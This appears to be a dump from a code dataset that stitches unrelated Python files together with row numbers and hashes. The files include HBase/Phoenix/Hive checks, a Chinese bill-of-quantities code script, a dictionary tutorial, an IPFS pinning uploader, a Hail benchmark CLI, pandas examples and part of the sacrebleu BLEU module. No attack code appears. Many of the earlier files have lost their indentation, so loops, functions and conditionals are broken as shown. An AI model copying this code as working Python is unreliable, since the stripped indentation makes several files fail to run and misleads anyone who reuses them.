python /usr/lib/phoenix/bin/sqlline.py
CREATE TABLE "CUSTOMERSPHOENIX" (pk VARCHAR PRIMARY KEY, first_name VARCHAR, last_name VARCHAR, company_name VARCHAR, address VARCHAR, city VARCHAR, county VARCHAR, state VARCHAR, zip VARCHAR, phone1 VARCHAR, phone2 VARCHAR, email VARCHAR, web VARCHAR)
python /usr/lib/phoenix/bin/psql.py -t CUSTOMERSPHOENIX -d "|" localhost customers-with-out-header-500.csv
SELECT A.*, B.* FROM CUSTOMERS AS A FULL JOIN CUSTOMERSPHOENIX AS B ON (A.PK = B.PK) WHERE A.PK IS NULL OR B.PK IS NULL
hive steps
CREATE EXTERNAL TABLE customers_hive(key string, first_name string, last_name string, company_name string, address string, city string, county string, state string, zip string, phone1 string, phone2 string, email string, web string)
STORED BY 'org.apache.hadoop.hive.hbase.HBaseStorageHandler'
WITH SERDEPROPERTIES ("hbase.columns.mapping" = ":key, cf:first_name, cf:last_name, cf:company_name, cf:address, cf:city, cf:county, cf:state, cf:zip, cf:phone1, cf:phone2, cf:email, cf:web")
TBLPROPERTIES ("hbase.table.name"="CUSTOMERS");
SELECT yourcolumns
FROM tablenames
JOIN tablenames
WHERE condition
GROUP BY yourcolumns
HAVING aggregatecolumn condition
ORDER BY yourcolumns
'''
import pandas as pd
import happybase
import phoenixdb
from pyhive import hive
connection = happybase.Connection()
connection.open()
print('list of hbase tables {}'.format(connection.tables()))
customers = connection.table('CUSTOMERS')
keys = []
data_list = []
for key, data in customers.scan():
keys.append(key)
data_list.append(data)
hbase_columns = [x.decode('utf-8')[3:] for x in data_list[0].keys()]
print('len of hbase keys {}'.format(len(keys)))
print('hbase columns {}'.format(hbase_columns))
print('hbase columns len {}'.format(len(hbase_columns)))
df = pd.read_csv('customers-with-header-500.csv', delimiter='|', index_col='index')
df_columns = list(df.columns)
print('csv file shape {}'.format(df.shape))
print('csv columns {}'.format(df_columns))
print('hbase columns == csv columns: {}'.format(set(hbase_columns) == set(df_columns)))
print('hbase row count == csv row count: {}'.format(len(keys) == df.shape[0]))
url = 'http://localhost:8765/'
conn = phoenixdb.connect(url, autocommit=True)
cursor = conn.cursor()
query1 = 'DROP VIEW "CUSTOMERS"'
cursor.execute(query1)
query2 = 'CREATE VIEW "CUSTOMERS" (pk VARCHAR PRIMARY KEY, "cf"."first_name" VARCHAR, "cf"."last_name" VARCHAR, "cf"."company_name" VARCHAR, "cf"."address" VARCHAR, "cf"."city" VARCHAR, "cf"."county" VARCHAR, "cf"."state" VARCHAR, "cf"."zip" VARCHAR, "cf"."phone1" VARCHAR, "cf"."phone2" VARCHAR, "cf"."email" VARCHAR, "cf"."web" VARCHAR)'
cursor.execute(query2)
query3 = 'SELECT * FROM CUSTOMERS'
cursor.execute(query3)
data = cursor.fetchall()
print(data[:2])
from pyhive import hive # or import hive
cursor = hive.connect('localhost').cursor()
cursor.execute('SELECT * FROM customers_hive LIMIT 10')
result = cursor.fetchall()
print(len(result))
print(result)
|
9,566 | 857e3e04b99cb346fd89b34c0d14957d65b7ac38 | #公路工程工程量清单编码默认格式母节点为数字型式,子节点为-b字母形式,为使编码唯一便于数据处理,编制此脚本
import re
import pandas as pd
import os
def get_csv_path():#原编码保存为csv文件的一列,便于读取
path=input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
def unique_code():
path=get_csv_path()
path_dir=os.path.dirname(path)
frame1=pd.read_csv(path,encoding='utf-8')
list1=list(frame1.iloc[:,0])
pat1=re.compile(r'\d+-\d+')#数字打头的母节点匹配符
pat2=re.compile(r'-\D{1}-\d+')#二级子节点,即-字母-数字形式匹配符
list2=[]
i=100
for code in list1:
if code=='':
list2.append(i)
i+=100
elif re.match(pat1,code):
cover=code
list2.append(cover)
else:
list2.append(cover+code)
frame2=pd.DataFrame(list2,)
frame2.to_csv(os.path.join(path_dir,'code_csv_out.csv'),encoding='utf-8-sig')
if __name__=='__main__':
unique_code()
|
9,567 | 84d0c439fcee4339250ced11dd2264740cc20d9c | import ply.lex as lex
print("hello word!")
|
9,568 | 797cedc9dc2a47713b9554e4f5975a4505ecf6d3 | #!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
pass
class Main():
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {
'1975': 'Holy Grail',
'1979': 'Life of Brain',
'1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {
'Holy Grail': '1975',
'Life of Brain': '1979',
'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[(2, 3, 6)])
else:
print(0)
try:
print(Matrix[(2, 3, 6)])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
'name': 'Bob',
'jobs': ['developer', 'manager'],
'web': 'www.bobs.org/?Bob',
'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
'name': 'other',
'jobs': ['hr', 'manager'],
'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
# print(k[0])
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys(): print(k)
for key in d: print(key)
# 排序{'a': 1, 'b': 2, 'c': 3}
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks): print(k, D[k])
|
9,569 | cc985ae061c04696dbf5114273befd62321756ae | __title__ = 'pyaddepar'
__version__ = '0.6.0'
__author__ = 'Thomas Schmelzer'
__license__ = 'MIT'
__copyright__ = 'Copyright 2019 by Lobnek Wealth Management' |
9,570 | 79ff164c36cc5f0a2382a571ec183952a03e66cc | import csv
import hashdate as hd
with open('Grainger_Library.csv', newline='') as f:
reader = csv.reader(f)
data = list(reader)
del data[0]
gld = []
glo = []
data.sort(key=lambda x:x[1])
for i in range(0,len(data)):
gld.append((data[i][1],data[i][2]))
print('ahd:')
#print(ahd)
glh = hd.hashdate(365,20200101)
for i in range(0,len(gld)):
glh.insert(gld[i][0], gld[i][1])
print('ahh:')
glh.display()
for i in range(0,len(glh.t)):
if glh.t[i] != None:
glo.append((glh.outd(i),glh.outn(i)))
#print(ahh.outd(i))
print('aho:')
print(glo) |
9,571 | 7ca88d451ad702e5a8e532da3e3f5939cfaa7215 | import argparse
import subprocess
import os
def get_files(dir_path, ext='.png'):
relative_paths = os.listdir(dir_path)
relative_paths = list(filter(lambda fp: ext in fp, relative_paths))
return list(map(lambda rel_p: os.path.join(dir_path, rel_p), relative_paths))
def ipfs_add_local(file_path):
'Returns CID'
proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True, text=True)
stdout = proc.stdout
try:
return stdout.split()[1]
except IndexError as e:
print(e)
print(stdout)
return ""
def pin_with_pinata(cid, name):
proc = subprocess.run(['ipfs', 'pin', 'remote', 'add', '--service=pinata', f'--name={name}', str(cid)], capture_output=True, text=True)
print(f'Uploaded cid: {cid}')
# print(proc.stdout)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Batch IPFS file uploading')
parser.add_argument('-i', '--input', help='Path to directory containing media to upload', required=True)
args = vars(parser.parse_args())
files_to_upload = get_files(args['input'])
info = {}
for fp in files_to_upload:
print(fp)
cid = ipfs_add_local(fp)
if cid == "":
print(f'{fp} failed to upload!')
continue
name = os.path.basename(fp)
info[name] = {'cid': cid}
pin_with_pinata(cid, name)
with open(f'{args["input"]}/result.csv', 'w') as f:
for fn in sorted(info.keys()):
cid = info[fn]['cid']
f.write(f'{fn}, {cid}\n')
f.close()
|
9,572 | d4625dd743dd6648044e40b02743ae80f4caea36 | import argparse
import datetime
import json
import os
import sys
import hail as hl
from .utils import run_all, run_pattern, run_list, RunConfig
from .. import init_logging
def main(args):
init_logging()
records = []
def handler(stats):
records.append(stats)
data_dir = args.data_dir or os.environ.get('HAIL_BENCHMARK_DIR') or '/tmp/hail_benchmark_data'
profiler_path = os.environ.get('ASYNC_PROFILER_HOME')
if args.profile and profiler_path is None:
raise KeyError("In order to use --profile, you must download async-profiler and set `ASYNC_PROFILER_HOME`")
config = RunConfig(args.n_iter, handler, noisy=not args.quiet, timeout=args.timeout, dry_run=args.dry_run,
data_dir=data_dir, cores=args.cores, verbose=args.verbose, log=args.log,
profiler_path=profiler_path, profile=args.profile, prof_fmt=args.prof_fmt)
if args.tests:
run_list(args.tests.split(','), config)
if args.pattern:
run_pattern(args.pattern, config)
if not args.pattern and not args.tests:
run_all(config)
if args.dry_run:
return
data = {'config': {'cores': args.cores,
'version': hl.__version__,
'timestamp': str(datetime.datetime.now()),
'system': sys.platform},
'benchmarks': records}
if args.output:
with open(args.output, 'w') as out:
json.dump(data, out)
else:
print(json.dumps(data))
def register_main(subparser) -> 'None':
parser = subparser.add_parser(
'run',
help='Run Hail benchmarks locally.',
description='Run Hail benchmarks locally.'
)
parser.add_argument('--tests', '-t',
type=str,
required=False,
help='Run specific comma-delimited tests instead of running all tests.')
parser.add_argument('--cores', '-c',
type=int,
default=1,
help='Number of cores to use.')
parser.add_argument('--pattern', '-k', type=str, required=False,
help='Run all tests that substring match the pattern')
parser.add_argument("--n-iter", "-n",
type=int,
default=3,
help='Number of iterations for each test.')
parser.add_argument("--log", "-l",
type=str,
help='Log file path')
parser.add_argument("--quiet", "-q",
action="store_true",
help="Do not print testing information to stderr in real time.")
parser.add_argument("--verbose", "-v",
action="store_true",
help="Do not silence Hail logging to standard output.")
parser.add_argument("--output", "-o",
type=str,
help="Output file path.")
parser.add_argument("--data-dir", "-d",
type=str,
help="Data directory.")
parser.add_argument('--timeout',
type=int,
default=1800,
help="Timeout in seconds after which benchmarks will be interrupted")
parser.add_argument('--dry-run',
action='store_true',
help='Print benchmarks to execute, but do not run.')
parser.add_argument('--profile', '-p',
choices=['cpu', 'alloc', 'itimer'],
nargs='?', const='cpu',
help='Run with async-profiler.')
parser.add_argument('--prof-fmt', '-f',
choices=['html', 'flame', 'jfr'],
default='html',
help='Choose profiler output.')
parser.set_defaults(main=main)
|
9,573 | 8d8f1f0dbb76b5c536bd1a2142bb61c51dd75075 | import pandas as pd
import numpy as np
df = pd.DataFrame([['Hospital1', '2019-10-01'],
['Hospital2', '2019-10-01'],
['Hospital3', '2019-10-01'],
['Hospital1', '2019-10-01'],
['Hospital2', '2019-10-02'],
['Hospital3', '2019-10-02'],
['Hospital2', '2019-10-03'],
['Hospital2', '2019-10-04'],
['Hospital3', '2019-10-04'],
['Hospital3', '2019-10-05'],
['Hospital1', '2019-10-06'],
['Hospital1', '2019-10-07'],
['Hospital1', '2019-10-08']],
columns=['Hospital_Name', 'Date'])
df2 = pd.DataFrame([['Hospital1',12,15,16,12],
['Hospital2',10,17,14,12],
['Hospital2',15,20,12,12]],
columns=['Hospital_Name', '2019-10-01', '2019-10-02', '2019-10-03', '2019-10-04'])
print(pd.pivot_table(df, values='Date', index='Hospital_Name', aggfunc=np.size))
print(df2.sum()) |
9,574 | 4f1956b34ac3b55b2d40220b79816c139b4a2f5c | import setuptools
setuptools.setup(
name='cppersist',
install_requires=['Eve']
)
|
9,575 | 8adcd75e925fe0c5a50b2fc7dc8c472a9610b4f2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2017--2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
SacreBLEU provides hassle-free computation of shareable, comparable, and reproducible BLEU scores.
Inspired by Rico Sennrich's `multi-bleu-detok.perl`, it produces the official WMT scores but works with plain text.
It also knows all the standard test sets and handles downloading, processing, and tokenization for you.
See the [README.md] file for more information.
"""
import argparse
import gzip
import hashlib
import io
import logging
import math
import os
import portalocker
import re
import sys
import ssl
import urllib.request
from collections import Counter
from itertools import zip_longest
from typing import List, Iterable, Tuple, Union
from .tokenizer import TOKENIZERS, TokenizeMeCab
from .dataset import DATASETS, DOMAINS, COUNTRIES, SUBSETS
from . import __version__ as VERSION
sacrelogger = logging.getLogger('sacrebleu')
try:
# SIGPIPE is not available on Windows machines, throwing an exception.
from signal import SIGPIPE
# If SIGPIPE is available, change behaviour to default instead of ignore.
from signal import signal, SIG_DFL
signal(SIGPIPE, SIG_DFL)
except ImportError:
sacrelogger.warning('Could not import signal.SIGPIPE (this is expected on Windows machines)')
# Where to store downloaded test sets.
# Define the environment variable $SACREBLEU, or use the default of ~/.sacrebleu.
#
# Querying for a HOME environment variable can result in None (e.g., on Windows)
# in which case the os.path.join() throws a TypeError. Using expanduser() is
# a safe way to get the user's home folder.
USERHOME = os.path.expanduser("~")
SACREBLEU_DIR = os.environ.get('SACREBLEU', os.path.join(USERHOME, '.sacrebleu'))
# n-gram order. Don't change this.
NGRAM_ORDER = 4
# Default values for CHRF
CHRF_ORDER = 6
# default to 2 (per http://www.aclweb.org/anthology/W16-2341)
CHRF_BETA = 2
# The default floor value to use with `--smooth floor`
SMOOTH_VALUE_DEFAULT = {'floor': 0.0, 'add-k': 1}
DEFAULT_TOKENIZER = '13a'
def smart_open(file, mode='rt', encoding='utf-8'):
"""Convenience function for reading compressed or plain text files.
:param file: The file to read.
:param mode: The file mode (read, write).
:param encoding: The file encoding.
"""
if file.endswith('.gz'):
return gzip.open(file, mode=mode, encoding=encoding, newline="\n")
return open(file, mode=mode, encoding=encoding, newline="\n")
def my_log(num):
"""
Floors the log function
:param num: the number
:return: log(num) floored to a very low number
"""
if num == 0.0:
return -9999999999
return math.log(num)
def bleu_signature(args, numrefs):
"""
Builds a signature that uniquely identifies the scoring parameters used.
:param args: the arguments passed into the script
:return: the signature
"""
# Abbreviations for the signature
abbr = {
'test': 't',
'lang': 'l',
'smooth': 's',
'case': 'c',
'tok': 'tok',
'numrefs': '#',
'version': 'v',
'origlang': 'o',
'subset': 'S',
}
signature = {'tok': args.tokenize,
'version': VERSION,
'smooth': args.smooth,
'numrefs': numrefs,
'case': 'lc' if args.lc else 'mixed'}
# For the Japanese tokenizer, add a dictionary type and its version to the signature.
if args.tokenize == "ja-mecab":
signature['tok'] += "-" + TokenizeMeCab().signature()
if args.test_set is not None:
signature['test'] = args.test_set
if args.langpair is not None:
signature['lang'] = args.langpair
if args.origlang is not None:
signature['origlang'] = args.origlang
if args.subset is not None:
signature['subset'] = args.subset
sigstr = '+'.join(['{}.{}'.format(abbr[x] if args.short else x, signature[x]) for x in sorted(signature.keys())])
return sigstr
def chrf_signature(args, numrefs):
"""
Builds a signature that uniquely identifies the scoring parameters used.
:param args: the arguments passed into the script
:return: the chrF signature
"""
# Abbreviations for the signature
abbr = {
'test': 't',
'lang': 'l',
'numchars': 'n',
'space': 's',
'case': 'c',
'numrefs': '#',
'version': 'v',
'origlang': 'o',
'subset': 'S',
}
signature = {'version': VERSION,
'space': args.chrf_whitespace,
'numchars': args.chrf_order,
'numrefs': numrefs,
'case': 'lc' if args.lc else 'mixed'}
if args.test_set is not None:
signature['test'] = args.test_set
if args.langpair is not None:
signature['lang'] = args.langpair
if args.origlang is not None:
signature['origlang'] = args.origlang
if args.subset is not None:
signature['subset'] = args.subset
sigstr = '+'.join(['{}.{}'.format(abbr[x] if args.short else x, signature[x]) for x in sorted(signature.keys())])
return sigstr
def extract_ngrams(line, min_order=1, max_order=NGRAM_ORDER) -> Counter:
"""Extracts all the ngrams (min_order <= n <= max_order) from a sequence of tokens.
:param line: A segment containing a sequence of words.
:param min_order: Minimum n-gram length (default: 1).
:param max_order: Maximum n-gram length (default: NGRAM_ORDER).
:return: a dictionary containing ngrams and counts
"""
ngrams = Counter()
tokens = line.split()
for n in range(min_order, max_order + 1):
for i in range(0, len(tokens) - n + 1):
ngram = ' '.join(tokens[i: i + n])
ngrams[ngram] += 1
return ngrams
def extract_char_ngrams(s: str, n: int) -> Counter:
"""
Yields counts of character n-grams from string s of order n.
"""
return Counter([s[i:i + n] for i in range(len(s) - n + 1)])
def ref_stats(output, refs):
ngrams = Counter()
closest_diff = None
closest_len = None
for ref in refs:
tokens = ref.split()
reflen = len(tokens)
diff = abs(len(output.split()) - reflen)
if closest_diff is None or diff < closest_diff:
closest_diff = diff
closest_len = reflen
elif diff == closest_diff:
if reflen < closest_len:
closest_len = reflen
ngrams_ref = extract_ngrams(ref)
for ngram in ngrams_ref.keys():
ngrams[ngram] = max(ngrams[ngram], ngrams_ref[ngram])
return ngrams, closest_diff, closest_len
def _clean(s):
"""
Removes trailing and leading spaces and collapses multiple consecutive internal spaces to a single one.
:param s: The string.
:return: A cleaned-up string.
"""
return re.sub(r'\s+', ' ', s.strip())
def process_to_text(rawfile, txtfile, field: int=None):
"""Processes raw files to plain text files.
:param rawfile: the input file (possibly SGML)
:param txtfile: the plaintext file
:param field: For TSV files, which field to extract.
"""
if not os.path.exists(txtfile) or os.path.getsize(txtfile) == 0:
sacrelogger.info("Processing %s to %s", rawfile, txtfile)
if rawfile.endswith('.sgm') or rawfile.endswith('.sgml'):
with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
for line in fin:
if line.startswith('<seg '):
print(_clean(re.sub(r'<seg.*?>(.*)</seg>.*?', '\\1', line)), file=fout)
elif rawfile.endswith('.xml'): # IWSLT
with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
for line in fin:
if line.startswith('<seg '):
print(_clean(re.sub(r'<seg.*?>(.*)</seg>.*?', '\\1', line)), file=fout)
elif rawfile.endswith('.txt'): # wmt17/ms
with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
for line in fin:
print(line.rstrip(), file=fout)
elif rawfile.endswith('.tsv'): # MTNT
with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
for line in fin:
print(line.rstrip().split('\t')[field], file=fout)
def print_test_set(test_set, langpair, side, origlang=None, subset=None):
"""Prints to STDOUT the specified side of the specified test set
:param test_set: the test set to print
:param langpair: the language pair
:param side: 'src' for source, 'ref' for reference
:param origlang: print only sentences with a given original language (2-char ISO639-1 code), "non-" prefix means negation
:param subset: print only sentences whose document annotation matches a given regex
"""
files = download_test_set(test_set, langpair)
if side == 'src':
files = [files[0]]
elif side == 'ref':
files.pop(0)
streams = [smart_open(file) for file in files]
streams = _filter_subset(streams, test_set, langpair, origlang, subset)
for lines in zip(*streams):
print('\t'.join(map(lambda x: x.rstrip(), lines)))
def download_test_set(test_set, langpair=None):
"""Downloads the specified test to the system location specified by the SACREBLEU environment variable.
:param test_set: the test set to download
:param langpair: the language pair (needed for some datasets)
:return: the set of processed files
"""
outdir = os.path.join(SACREBLEU_DIR, test_set)
os.makedirs(outdir, exist_ok=True)
expected_checksums = DATASETS[test_set].get('md5', [None] * len(DATASETS[test_set]))
for dataset, expected_md5 in zip(DATASETS[test_set]['data'], expected_checksums):
tarball = os.path.join(outdir, os.path.basename(dataset))
rawdir = os.path.join(outdir, 'raw')
lockfile = '{}.lock'.format(tarball)
with portalocker.Lock(lockfile, 'w', timeout=60):
if not os.path.exists(tarball) or os.path.getsize(tarball) == 0:
sacrelogger.info("Downloading %s to %s", dataset, tarball)
try:
with urllib.request.urlopen(dataset) as f, open(tarball, 'wb') as out:
out.write(f.read())
except ssl.SSLError:
sacrelogger.warning('An SSL error was encountered in downloading the files. If you\'re on a Mac, '
'you may need to run the "Install Certificates.command" file located in the '
'"Python 3" folder, often found under /Applications')
sys.exit(1)
# Check md5sum
if expected_md5 is not None:
md5 = hashlib.md5()
with open(tarball, 'rb') as infile:
for line in infile:
md5.update(line)
if md5.hexdigest() != expected_md5:
sacrelogger.error('Fatal: MD5 sum of downloaded file was incorrect (got {}, expected {}).'.format(md5.hexdigest(), expected_md5))
sacrelogger.error('Please manually delete "{}" and rerun the command.'.format(tarball))
sacrelogger.error('If the problem persists, the tarball may have changed, in which case, please contact the SacreBLEU maintainer.')
sys.exit(1)
else:
sacrelogger.info('Checksum passed: {}'.format(md5.hexdigest()))
# Extract the tarball
sacrelogger.info('Extracting %s', tarball)
if tarball.endswith('.tar.gz') or tarball.endswith('.tgz'):
import tarfile
with tarfile.open(tarball) as tar:
tar.extractall(path=rawdir)
elif tarball.endswith('.zip'):
import zipfile
with zipfile.ZipFile(tarball, 'r') as zipfile:
zipfile.extractall(path=rawdir)
found = []
# Process the files into plain text
languages = DATASETS[test_set].keys() if langpair is None else [langpair]
for pair in languages:
if '-' not in pair:
continue
src, tgt = pair.split('-')
rawfile = DATASETS[test_set][pair][0]
field = None # used for TSV files
if rawfile.endswith('.tsv'):
field, rawfile = rawfile.split(':', maxsplit=1)
field = int(field)
rawpath = os.path.join(rawdir, rawfile)
outpath = os.path.join(outdir, '{}.{}'.format(pair, src))
process_to_text(rawpath, outpath, field=field)
found.append(outpath)
refs = DATASETS[test_set][pair][1:]
for i, ref in enumerate(refs):
field = None
if ref.endswith('.tsv'):
field, ref = ref.split(':', maxsplit=1)
field = int(field)
rawpath = os.path.join(rawdir, ref)
if len(refs) >= 2:
outpath = os.path.join(outdir, '{}.{}.{}'.format(pair, tgt, i))
else:
outpath = os.path.join(outdir, '{}.{}'.format(pair, tgt))
process_to_text(rawpath, outpath, field=field)
found.append(outpath)
return found
class Result:
def __init__(self, score: float):
self.score = score
def __str__(self):
return self.format()
class BLEU(Result):
def __init__(self,
score: float,
counts,
totals,
precisions,
bp,
sys_len,
ref_len):
super().__init__(score)
self.counts = counts
self.totals = totals
self.precisions = precisions
self.bp = bp
self.sys_len = sys_len
self.ref_len = ref_len
def format(self, width=2):
precisions = "/".join(["{:.1f}".format(p) for p in self.precisions])
return 'BLEU = {score:.{width}f} {precisions} (BP = {bp:.3f} ratio = {ratio:.3f} hyp_len = {sys_len:d} ref_len = {ref_len:d})'.format(
score=self.score,
width=width,
precisions=precisions,
bp=self.bp,
ratio=self.sys_len / self.ref_len,
sys_len=self.sys_len,
ref_len=self.ref_len)
class CHRF(Result):
def __init__(self, score: float):
super().__init__(score)
def format(self, width=2):
return '{score:.{width}f}'.format(score=self.score, width=width)
def compute_bleu(correct: List[int],
total: List[int],
sys_len: int,
ref_len: int,
smooth_method = 'none',
smooth_value = None,
use_effective_order = False) -> BLEU:
"""Computes BLEU score from its sufficient statistics. Adds smoothing.
Smoothing methods (citing "A Systematic Comparison of Smoothing Techniques for Sentence-Level BLEU",
Boxing Chen and Colin Cherry, WMT 2014: http://aclweb.org/anthology/W14-3346)
- exp: NIST smoothing method (Method 3)
- floor: Method 1
- add-k: Method 2 (generalizing Lin and Och, 2004)
- none: do nothing.
:param correct: List of counts of correct ngrams, 1 <= n <= NGRAM_ORDER
:param total: List of counts of total ngrams, 1 <= n <= NGRAM_ORDER
:param sys_len: The cumulative system length
:param ref_len: The cumulative reference length
:param smooth: The smoothing method to use
:param smooth_value: The smoothing value added, if smooth method 'floor' is used
:param use_effective_order: If true, use the length of `correct` for the n-gram order instead of NGRAM_ORDER.
:return: A BLEU object with the score (100-based) and other statistics.
"""
if smooth_method in SMOOTH_VALUE_DEFAULT and smooth_value is None:
smooth_value = SMOOTH_VALUE_DEFAULT[smooth_method]
precisions = [0 for x in range(NGRAM_ORDER)]
smooth_mteval = 1.
effective_order = NGRAM_ORDER
for n in range(1, NGRAM_ORDER + 1):
if smooth_method == 'add-k' and n > 1:
correct[n-1] += smooth_value
total[n-1] += smooth_value
if total[n-1] == 0:
break
if use_effective_order:
effective_order = n
if correct[n-1] == 0:
if smooth_method == 'exp':
smooth_mteval *= 2
precisions[n-1] = 100. / (smooth_mteval * total[n-1])
elif smooth_method == 'floor':
precisions[n-1] = 100. * smooth_value / total[n-1]
else:
precisions[n-1] = 100. * correct[n-1] / total[n-1]
# If the system guesses no i-grams, 1 <= i <= NGRAM_ORDER, the BLEU score is 0 (technically undefined).
# This is a problem for sentence-level BLEU or a corpus of short sentences, where systems will get no credit
# if sentence lengths fall under the NGRAM_ORDER threshold. This fix scales NGRAM_ORDER to the observed
# maximum order. It is only available through the API and off by default
brevity_penalty = 1.0
if sys_len < ref_len:
brevity_penalty = math.exp(1 - ref_len / sys_len) if sys_len > 0 else 0.0
score = brevity_penalty * math.exp(sum(map(my_log, precisions[:effective_order])) / effective_order)
return BLEU(score, correct, total, precisions, brevity_penalty, sys_len, ref_len)
def sentence_bleu(hypothesis: str,
references: List[str],
smooth_method: str = 'floor',
smooth_value: float = None,
use_effective_order: bool = True) -> BLEU:
"""
Computes BLEU on a single sentence pair.
Disclaimer: computing BLEU on the sentence level is not its intended use,
BLEU is a corpus-level metric.
:param hypothesis: Hypothesis string.
:param reference: Reference string.
:param smooth_value: For 'floor' smoothing, the floor value to use.
:param use_effective_order: Account for references that are shorter than the largest n-gram.
:return: Returns a single BLEU score as a float.
"""
bleu = corpus_bleu(hypothesis, references,
smooth_method=smooth_method,
smooth_value=smooth_value,
use_effective_order=use_effective_order)
return bleu
def corpus_bleu(sys_stream: Union[str, Iterable[str]],
ref_streams: Union[str, List[Iterable[str]]],
smooth_method='exp',
smooth_value=None,
force=False,
lowercase=False,
tokenize=DEFAULT_TOKENIZER,
use_effective_order=False) -> BLEU:
"""Produces BLEU scores along with its sufficient statistics from a source against one or more references.
:param sys_stream: The system stream (a sequence of segments)
:param ref_streams: A list of one or more reference streams (each a sequence of segments)
:param smooth: The smoothing method to use
:param smooth_value: For 'floor' smoothing, the floor to use
:param force: Ignore data that looks already tokenized
:param lowercase: Lowercase the data
:param tokenize: The tokenizer to use
:return: a BLEU object containing everything you'd want
"""
# Add some robustness to the input arguments
if isinstance(sys_stream, str):
sys_stream = [sys_stream]
if isinstance(ref_streams, str):
ref_streams = [[ref_streams]]
sys_len = 0
ref_len = 0
correct = [0 for n in range(NGRAM_ORDER)]
total = [0 for n in range(NGRAM_ORDER)]
# look for already-tokenized sentences
tokenized_count = 0
fhs = [sys_stream] + ref_streams
for lines in zip_longest(*fhs):
if None in lines:
raise EOFError("Source and reference streams have different lengths!")
if lowercase:
lines = [x.lower() for x in lines]
if not (force or tokenize == 'none') and lines[0].rstrip().endswith(' .'):
tokenized_count += 1
if tokenized_count == 100:
sacrelogger.warning('That\'s 100 lines that end in a tokenized period (\'.\')')
sacrelogger.warning('It looks like you forgot to detokenize your test data, which may hurt your score.')
sacrelogger.warning('If you insist your data is detokenized, or don\'t care, you can suppress this message with \'--force\'.')
output, *refs = [TOKENIZERS[tokenize](x.rstrip()) for x in lines]
ref_ngrams, closest_diff, closest_len = ref_stats(output, refs)
sys_len += len(output.split())
ref_len += closest_len
sys_ngrams = extract_ngrams(output)
for ngram in sys_ngrams.keys():
n = len(ngram.split())
correct[n-1] += min(sys_ngrams[ngram], ref_ngrams.get(ngram, 0))
total[n-1] += sys_ngrams[ngram]
